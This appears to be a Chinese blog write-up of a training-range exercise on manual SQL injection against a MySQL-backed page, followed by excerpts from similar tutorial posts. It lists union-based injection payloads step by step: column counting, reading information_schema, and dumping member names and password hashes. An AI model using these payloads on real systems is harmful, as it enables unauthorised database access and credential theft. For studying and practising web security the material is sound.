SQL手工注入漏洞測試 MySQL資料庫

2021-09-26 19:24:25 字數 695 閱讀 9035

判斷注入點,id=1 and 1=1正常,id=1 and 1=2報錯,發現存在sql注入

id =1 and 1=2 order by n#,n=1,2,3,4…發現有4列

判斷回顯id=1 and 1=2 union select 1,2,3,4

id=1 and 1=2 union select 1,database(),3,4發現資料庫名

id=1 and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema =database(),發現表名

id=1 and 1=2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='stormgroup_member』發現列名

id=1 and 1=2 union select 1,2,group_concat(name,』-』,password),4 from stormgroup_member得到使用者密碼

md5解密登陸得到keymozhe9ad0c120e73d88c14008ad62f74

SQL手工注入漏洞測試 MySQL資料庫

墨者學院的題 記一下通關經過 本題純屬練習手工,無任何過濾。sql手工注入漏洞測試 mysql資料庫 還有 的一篇iamsoscared大神的sqlmap詳細教程。點選開啟靶場環境,訪問題目 ok一進來就是登入框 試了一下登入框並沒有發現注入,到處點點看 發現登入框下面的公告的鏈結是?id 1,手工...

SQL手工注入漏洞測試 MySQL資料庫 字元型)

第一步 判斷注入點 在瀏覽器的url介面輸入乙個單引號,發現頁面報錯,接著輸入 new list.php?id tingjigonggao 發現頁面正常,由此該url存在字元型注入漏洞 第二步 判斷字段數 利用order by 語句,值為4頁面正常。後面的可以用單引號,也可以用 來表示 new li...

基礎Web漏洞 SQL注入入門 手工注入篇

sql是運算元據庫資料的結構化查詢語言,網頁的應用資料和後台資料庫中的資料進行互動時會採用sql。而sql注入是將web頁面的原url 表單域或資料報輸入的引數,修改拼接成sql語句,傳遞給web伺服器,進而傳給資料庫伺服器以執行資料庫命令。如web應用程式的開發人員對使用者所輸入的資料或cooki...